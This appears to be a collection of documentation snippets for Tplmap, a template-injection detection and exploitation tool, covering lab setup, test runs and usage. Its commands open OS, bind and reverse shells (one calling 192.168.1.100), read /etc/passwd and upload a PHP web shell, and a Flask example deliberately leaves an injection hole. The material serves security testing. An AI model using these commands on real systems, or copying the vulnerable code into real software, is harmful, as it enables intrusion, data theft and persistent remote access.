### Start All Tplmap Test Environments Source: https://github.com/epinna/tplmap/blob/master/docker-envs/README.md This command initializes and starts all defined vulnerable test environments configured in the docker-compose.yml file. It requires Docker and Docker Compose to be installed on the host system. ```bash docker-compose up ``` -------------------------------- ### Start Specific Tplmap Test Environments Source: https://github.com/epinna/tplmap/blob/master/docker-envs/README.md This command allows for the selective startup of specific test containers, such as Python and PHP environments. It is useful for isolating testing targets to specific languages. ```bash docker-compose up tplmap_test_python tplmap_test_php ``` -------------------------------- ### Install Jython for Burp Suite Source: https://github.com/epinna/tplmap/blob/master/burp_extension/README.md Downloads and installs the Jython standalone JAR file required to run Python extensions within Burp Suite. This script automates the download, directory creation, and silent installation process. ```bash $ wget 'https://repo1.maven.org/maven2/org/python/jython-installer/2.7.2/jython-installer-2.7.2.jar' -O jython_installer.jar $ mkdir "$HOME"/jython $ java -jar jython_installer.jar -s -d "$HOME"/jython -t standard $ rm jython_installer.jar ``` -------------------------------- ### Tplmap Burp Suite Integration Prerequisites Source: https://context7.com/epinna/tplmap/llms.txt Provides instructions for setting up Tplmap as a Burp Suite extension. This involves installing Jython, necessary Python dependencies for Jython, and configuring Burp Suite to load the Tplmap extension. ```bash # Prerequisites installation # 1. Install Jython wget 'https://repo1.maven.org/maven2/org/python/jython-installer/2.7.2/jython-installer-2.7.2.jar' -O jython_installer.jar mkdir "$HOME"/jython java -jar jython_installer.jar -s -d "$HOME"/jython -t standard # 2. Install Python dependencies for Jython curl -sL 'https://github.com/yaml/pyyaml/archive/refs/tags/5.1.2.tar.gz' | tar xzf - cd pyyaml-5.1.2 && "$HOME"/jython/bin/jython setup.py install && cd .. curl -sL 'https://github.com/psf/requests/archive/refs/tags/v2.22.0.tar.gz' | tar xzf - cd requests-2.22.0 && "$HOME"/jython/bin/jython setup.py install && cd .. # 3. In Burp Suite: # - Go to Extender > Options > Python Environment # - Set Jython JAR: $HOME/jython/jython.jar # - Load burp_extension.py as Python extension # - Configure options in the 'Tplmap' tab # - Run active scans on targets ``` -------------------------------- ### Tplmap Running Test Suite Source: https://context7.com/epinna/tplmap/llms.txt Details on how to execute Tplmap's built-in test suite for various language environments (Node.js, Python, PHP, Ruby, Java). It also shows how to start a vulnerable test server and then use Tplmap to test against it. ```bash # Run tests for specific language environments cd tests/ # Node.js tests (Pug, Nunjucks, EJS, etc.) ./run_node_tests.sh --test # Python tests (Jinja2, Mako, Tornado) ./run_python2_tests.sh --test ./run_python3_tests.sh --test # PHP tests (Smarty, Twig) ./run_php_tests.sh --test # Ruby tests (ERB, Slim) ./run_ruby_tests.sh --test # Java tests (Freemarker, Velocity) ./run_java_tests.sh --test # Manual testing: Start vulnerable server ./run_node_tests.sh # Output: # Exposed testing APIs: # http://localhost:15004/pug?inj=* # http://localhost:15004/nunjucks?inj=* # http://localhost:15004/blind/pug?inj=* # Then test with Tplmap in another terminal ./tplmap.py -u 'http://localhost:15004/nunjucks?inj=*' --os-shell ``` -------------------------------- ### Install Python Dependencies for Tplmap Source: https://github.com/epinna/tplmap/blob/master/burp_extension/README.md Installs the required PyYaml and requests libraries into the Jython environment. This ensures the Tplmap extension has the necessary modules to function correctly. ```bash $ curl -sL 'https://github.com/yaml/pyyaml/archive/refs/tags/5.1.2.tar.gz' | tar xzf - $ cd pyyaml-5.1.2 $ "$HOME"/jython/bin/jython setup.py install $ cd .. $ curl -sL 'https://github.com/psf/requests/archive/refs/tags/v2.22.0.tar.gz' | tar xzf - $ cd requests-2.22.0 $ "$HOME"/jython/bin/jython setup.py install $ cd .. $ rm -rf pyyaml-5.1.2 requests-2.22.0 ``` -------------------------------- ### Run Automatic Tplmap Tests Source: https://github.com/epinna/tplmap/wiki/Run-the-test-suite Shows how to execute the Tplmap testing scripts with the '--test' option for automatic testing. This command initiates automated tests, which may include dependency installation, and provides a summary of the test results. ```bash $ ./run_php_tests.sh --test ... ... ... ... ---------------------------------------------------------------------- Ran 12 tests in 18.206s OK $ ``` -------------------------------- ### Detecting SSTI with Tplmap Source: https://github.com/epinna/tplmap/blob/master/README.md Example command to run Tplmap against a target URL to identify injection points and determine the underlying template engine. ```bash ./tplmap.py -u 'http://www.target.com/page?name=John' ``` -------------------------------- ### Reset Tplmap Test Environment Dependencies Source: https://github.com/epinna/tplmap/wiki/Run-the-test-suite Provides a command to clean up and reset the libraries and dependencies installed by the Tplmap testing scripts. This is useful if any test script encounters issues or if a fresh environment is needed. ```bash rm -r tests/env_*_tests/lib/* ``` -------------------------------- ### Run Node.js SSTI Tests with Tplmap Source: https://github.com/epinna/tplmap/wiki/Run-the-test-suite Executes the Node.js testing script to start a web server with endpoints vulnerable to SSTI for Jade and Nunjucks template engines. It exposes testing APIs and redirects output to a temporary file. Tplmap can then be run against these exposed endpoints. ```bash $ ./run_node_tests.sh Exposed testing APIs: http://localhost:15004/jade?inj=* http://localhost:15004/blind/jade?inj=* http://localhost:15004/nunjucks?inj=* http://localhost:15004/blind/nunjucks?inj=* Web server standard output and error are redirected to file /tmp/tmp.2BnmKv9b ``` -------------------------------- ### Establish Reverse and Bind Shells Source: https://context7.com/epinna/tplmap/llms.txt Create network connections to the target system for persistent access. Supports both bind shells and reverse shells. ```bash ./tplmap.py -u 'http://target.com/page?name=*' --bind-shell 4444 ./tplmap.py -u 'http://target.com/page?name=*' --reverse-shell 192.168.1.100 4444 ``` -------------------------------- ### Launching an OS Shell via Tplmap Source: https://github.com/epinna/tplmap/blob/master/README.md Command to initiate a pseudo-terminal on the target server once an SSTI vulnerability has been confirmed by Tplmap. ```bash ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John' ``` -------------------------------- ### Manual Tplmap Scan on Vulnerable Endpoint Source: https://github.com/epinna/tplmap/wiki/Run-the-test-suite Demonstrates how to manually run Tplmap against a vulnerable Node.js endpoint exposed by the testing scripts. It shows the initial Tplmap output, identification of an injection point, and the discovered capabilities of the vulnerable environment. ```bash $ ./tplmap.py -u 'http://localhost:15004/jade?inj=*' [+] Tplmap 0.1b Automatic Server-Side Template Injection Detection and Exploitation Tool [+] Found placeholder in GET parameter 'inj' ... [+] Jade plugin is testing reflection on text context with tag = * [+] Jade plugin has confirmed injection with tag ' = * ' [+] Tplmap identified the following injection point: Engine: Jade Template: = * Context: text OS: darwin Capabilities: Code evaluation: yes, javascript code OS command execution: yes File write: yes File read: yes [+] Rerun tplmap providing one of the following options: --os-cmd or --os-shell to access the underlying operating system --upload LOCAL REMOTE to upload files to the server --download REMOTE LOCAL to download remote files ``` -------------------------------- ### Configure Detection Options Source: https://context7.com/epinna/tplmap/llms.txt Customize the scanning process by adjusting detection levels, specifying engines, or selecting between render-based and time-based techniques. ```bash ./tplmap.py -u 'http://target.com/page?name=*' --level 5 ./tplmap.py -u 'http://target.com/page?name=*' -e jinja2 ./tplmap.py -u 'http://target.com/page?name=*' -t R ./tplmap.py -u 'http://target.com/page?name=*' -t T ``` -------------------------------- ### Tplmap Header and Cookie Injection Testing Source: https://context7.com/epinna/tplmap/llms.txt Illustrates how to test for template injection vulnerabilities specifically within HTTP headers and cookies. It also shows how to use a custom injection tag if the default '*' is not suitable. ```bash # Test injection in header value ./tplmap.py -u 'http://target.com/page' -H 'X-Template: *' # Test injection in cookie value ./tplmap.py -u 'http://target.com/page' -c 'template=*' # Custom injection tag (default is *) ./tplmap.py -u 'http://target.com/page?name=INJECT' --injection-tag INJECT ``` -------------------------------- ### List Tplmap Test Scripts Source: https://github.com/epinna/tplmap/wiki/Run-the-test-suite Lists the available shell scripts within the './tests/' directory for running Tplmap against different environments. These scripts are used to launch vulnerable web servers for testing. ```bash $ cd ./tests/ $ ls run_*.sh ``` -------------------------------- ### Tplmap Basic Usage and Force Level Source: https://context7.com/epinna/tplmap/llms.txt Demonstrates the basic usage of Tplmap to scan a URL and force a specific crawl level and closure level. This is useful for controlling the depth of the scan. ```bash ./tplmap.py -u 'http://target.com/page?name=*' --force-level 2 1 ``` -------------------------------- ### Tplmap Template Engine Specific Testing Source: https://context7.com/epinna/tplmap/llms.txt Demonstrates how to test Tplmap against specific template engines by using the '-e' flag. This is useful when you have an idea of the technology stack being used or want to focus the scan. ```bash # Test against specific engine only ./tplmap.py -u 'http://target.com/page?name=*' -e mako ./tplmap.py -u 'http://target.com/page?name=*' -e freemarker ./tplmap.py -u 'http://target.com/page?name=*' -e erb ``` -------------------------------- ### Perform Basic SSTI URL Testing Source: https://context7.com/epinna/tplmap/llms.txt Test URL parameters for template injection vulnerabilities. The tool can automatically detect parameters or accept a '*' marker to define the specific injection point. ```bash ./tplmap.py -u 'http://target.com/page?name=John' ./tplmap.py -u 'http://target.com/page?name=*' ``` -------------------------------- ### Execute Template Code Injection Source: https://context7.com/epinna/tplmap/llms.txt Run native code directly within the target template engine. Provides both single-line execution and an interactive shell for multi-line code. ```bash ./tplmap.py -u 'http://target.com/page?name=*' --tpl-code '7*7' ./tplmap.py -u 'http://target.com/page?name=*' --tpl-shell ``` -------------------------------- ### Execute POST Data Injection Source: https://context7.com/epinna/tplmap/llms.txt Test POST parameters for template injection using the -d flag. This allows for testing form data or API payloads for vulnerabilities. ```bash ./tplmap.py -u 'http://target.com/page' -d 'name=John&email=test@test.com' ./tplmap.py -u 'http://target.com/page' -d 'name=*&email=test@test.com' ./tplmap.py -u 'http://target.com/api' -X POST -d 'template=*' ``` -------------------------------- ### Tplmap HTTP Request Customization Source: https://context7.com/epinna/tplmap/llms.txt Shows how to customize HTTP requests in Tplmap, including adding custom headers, setting cookies, specifying a user agent, and routing traffic through a proxy. These options are essential for testing authenticated endpoints or bypassing security controls. ```bash # Add custom headers ./tplmap.py -u 'http://target.com/page?name=*' \ -H 'Authorization: Bearer token123' \ -H 'X-Custom-Header: value' # Set cookies ./tplmap.py -u 'http://target.com/page?name=*' \ -c 'session=abc123' \ -c 'user=admin' # Custom user agent ./tplmap.py -u 'http://target.com/page?name=*' \ -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' # Route traffic through proxy (Burp Suite, ZAP, etc.) ./tplmap.py -u 'http://target.com/page?name=*' --proxy http://127.0.0.1:8080 ``` -------------------------------- ### Interact with Operating System Shell Source: https://context7.com/epinna/tplmap/llms.txt Gain OS-level access once an injection point is confirmed. Supports single command execution or launching an interactive shell session. ```bash ./tplmap.py -u 'http://target.com/page?name=John' --os-cmd 'whoami' ./tplmap.py -u 'http://target.com/page?name=John' --os-shell ``` -------------------------------- ### Perform Remote File Operations Source: https://context7.com/epinna/tplmap/llms.txt Upload or download files from the target server through the identified template injection vulnerability. ```bash ./tplmap.py -u 'http://target.com/page?name=*' --download /etc/passwd ./passwd_copy.txt ./tplmap.py -u 'http://target.com/page?name=*' --upload ./webshell.php /var/www/html/shell.php ./tplmap.py -u 'http://target.com/page?name=*' --upload ./file.txt /tmp/file.txt --force-overwrite ``` -------------------------------- ### Vulnerable Flask Application with Jinja2 Source: https://github.com/epinna/tplmap/blob/master/README.md A Python Flask application demonstrating an unsafe implementation of the Jinja2 template engine, where user input is concatenated directly into the template string, leading to SSTI. ```python from flask import Flask, request from jinja2 import Environment app = Flask(__name__) Jinja2 = Environment() @app.route("/page") def page(): name = request.values.get('name') # SSTI VULNERABILITY: Concatenating user input directly output = Jinja2.from_string('Hello ' + name + '!').render() return output if __name__ == "__main__": app.run(host='0.0.0.0', port=80) ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.